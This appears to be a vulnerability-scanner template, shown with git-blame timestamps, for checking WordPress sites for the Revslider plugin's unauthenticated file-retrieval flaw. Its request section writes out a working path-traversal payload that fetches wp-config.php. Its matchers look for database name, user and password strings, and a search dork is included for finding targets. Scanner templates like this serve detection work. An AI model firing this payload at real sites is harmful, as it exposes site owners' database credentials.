2021-11-21 11:30:25 +00:00
id : wp-revslider-file-download
2022-04-22 10:38:41 +00:00
2021-11-21 11:30:25 +00:00
info :
2022-05-13 20:26:43 +00:00
name : Wordpress Revslider - Arbitrary File Retrieval
2021-11-21 11:30:25 +00:00
author : pussycat0x
severity : high
2022-05-13 20:26:43 +00:00
description : The Revslider WordPress plugin iss affected by an unauthenticated file retrieval vulnerability, which could result in attacker downloading the wp-config.php file.
2021-11-21 11:30:25 +00:00
reference :
- https://blog.sucuri.net/2014/09/slider-revolution-plugin-critical-vulnerability-being-exploited.html
- https://cxsecurity.com/issue/WLB-2021090129
2021-11-22 17:25:00 +00:00
metadata :
google-dork : inurl:/wp-content/plugins/revslider
2021-11-23 04:09:29 +00:00
tags : wordpress,wp-plugin,lfi,revslider
2022-04-22 10:38:41 +00:00
2021-11-21 11:30:25 +00:00
requests :
- method : GET
path :
- '{{BaseURL}}/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
- '{{BaseURL}}/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
2021-11-22 17:25:00 +00:00
2021-11-21 11:30:25 +00:00
matchers-condition : and
matchers :
- type : word
2021-11-22 17:25:00 +00:00
part : body
2021-11-21 11:30:25 +00:00
words :
2021-11-23 04:09:29 +00:00
- "'DB_NAME'"
- "'DB_PASSWORD'"
- "'DB_USER'"
2021-11-21 11:30:25 +00:00
condition : and
2021-11-22 17:25:00 +00:00
2021-11-21 11:30:25 +00:00
- type : status
status :
2021-11-23 04:09:29 +00:00
- 200